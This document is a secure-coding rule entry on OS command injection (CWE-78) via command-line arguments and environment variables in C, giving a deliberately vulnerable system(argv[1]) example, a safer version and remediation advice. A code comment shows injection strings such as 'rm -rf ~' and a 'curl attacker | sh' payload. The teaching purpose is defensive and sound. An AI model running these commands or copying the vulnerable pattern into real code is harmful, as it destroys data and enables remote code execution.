Command-Line Argument or Environment Variable Access
Description
The program reads command-line arguments (`argv`) or environment variables (`getenv()`, `environ`). Both are supplied by whoever starts the process, so in a setuid/setgid binary, a CGI or wrapper script, or a service that forwards user input into a subprocess, they are attacker-controlled. Passing such a value unvalidated to `system()`, `popen()` or another shell-backed call lets the caller inject arbitrary commands (OS command injection, CWE-78); even when no shell is involved, an unchecked value can still select an unexpected file, option or search path. Note that `argv[argc]` is `NULL`, so indexing `argv[1]` without first checking `argc` is itself a bug.
Examples
Insecure Code
```c
#include <stdlib.h>

/* argv[1] is attacker-controlled and is handed to /bin/sh unmodified:
 * an argument such as "x; rm -rf ~" or "$(curl attacker | sh)" runs with
 * this program's privileges. */
int main(int argc, char *argv[])
{
    (void)argc;
    return system(argv[1]);
}
```

Secure Code

```c
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <arg>\n", argv[0]);
        return 1;
    }
    /* validate argv[1] against an allowlist of expected characters/values,
     * then run the target with execv()/execvp() and an explicit argument
     * vector instead of system(), so no shell ever parses the input */
    return 0;
}
```

Remediation
Treat command-line arguments and environment variables as untrusted input. Check `argc` before indexing `argv`. Validate each value against an allowlist (permitted characters, length, expected set of values) and reject anything else rather than trying to escape it. Do not pass them to `system()` or `popen()`; invoke the target with `execv()`/`execve()` and an explicit argument vector so the value is never interpreted by a shell, and use an absolute path for the executable so `PATH` from the environment is not consulted. In privileged programs, also avoid trusting `PATH`, `IFS`, `LD_*` and similar variables, or start from a clean environment.
Rule Details
| Field | Value |
|---|---|
| ID | CODE-0185 |
| Category | Injection |
| Severity | MEDIUM |
| CWE | CWE-78 |
| Confidence | MEDIUM |
| Impact | MEDIUM |
| Likelihood | MEDIUM |
| Exploitability | MODERATE |
| Tags | command-line, environment-variables |
| OWASP | N/A |